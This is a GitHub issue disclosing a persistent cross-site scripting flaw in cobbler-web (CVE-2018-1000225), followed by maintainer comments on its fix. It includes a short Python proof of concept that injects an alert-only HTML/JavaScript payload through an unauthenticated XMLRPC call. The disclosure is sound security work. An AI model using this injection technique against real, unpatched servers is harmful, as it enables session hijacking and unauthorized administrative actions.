Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Persistent XSS vulnerability in cobbler-web [CVE-2018-1000225] #1917

Closed
movermeyer opened this issue Aug 2, 2018 · 3 comments
Closed

Persistent XSS vulnerability in cobbler-web [CVE-2018-1000225] #1917

movermeyer opened this issue Aug 2, 2018 · 3 comments
Labels
Bug Report Reporting a bug Priority Issues that will be worked on with higher priority. Security Web-interface Should not be used anymore. We have a dedicated cobbler-web project for this
Projects

Comments

@movermeyer
Copy link
Contributor

cobbler-web renders HTML and executes JavaScript payloads that are provided by users.
Combined with authentication problems in the Cobbler XMLRPC API, this allows unauthenticated users to inject malicious payloads into the web UI.

A harmless Proof of Concept script:

import xmlrpc.client

cobbler_connection = xmlrpc.client.ServerProxy("http://127.0.0.1/cobbler_api", allow_none=True)

payload = """
<button onclick="myFunction()">Click me!</button>

<script>
function myFunction() {
    alert("Hah! you clicked!");
}
</script>
"""

cobbler_connection._new_event(payload)

Then when you visit the cobbler_web/events endpoint:

cobbler_js_event

These payloads can be used to hijack the sessions of administrator and perform actions that the attacker would otherwise be unable to, or to exfiltrate sensitive information.

cobbler-web should sanitize all user provided inputs, and treat them as untrusted. This included never rendering user provided HTML, nor executing user provided JavaScript.

See this post for more discussion.

@movermeyer movermeyer changed the title Persistent XSS vulnerability in cobbler-web Persistent XSS vulnerability in cobbler-web [CVE-2018-1000225] Aug 21, 2018
@meaksh
Copy link
Member

meaksh commented Dec 13, 2018

I think this issue could be now considered as fixed since the private _ methods from the XMLRPC API are not exposed anymore. Also modify_settings now requires auth token, so IIUC the issue described here is not longer happening.

@opoplawski
Copy link
Contributor

If this is fixed can we please close this. Also, if this is fixed, what version was it fixed in?

@SchoolGuy SchoolGuy added Bug Report Reporting a bug Priority Issues that will be worked on with higher priority. Web-interface Should not be used anymore. We have a dedicated cobbler-web project for this Security labels Jun 18, 2019
@SchoolGuy SchoolGuy added this to Inbox in Backlog Aug 15, 2019
@SchoolGuy SchoolGuy moved this from Inbox to Bug Reports in Backlog Oct 17, 2019
@SchoolGuy SchoolGuy moved this from Bug Reports to To do in Backlog Oct 24, 2019
@SchoolGuy
Copy link
Member

Backlog automation moved this from To do to Done Jan 24, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Bug Report Reporting a bug Priority Issues that will be worked on with higher priority. Security Web-interface Should not be used anymore. We have a dedicated cobbler-web project for this
Projects
No open projects
Backlog
  
Done
Development

No branches or pull requests

4 participants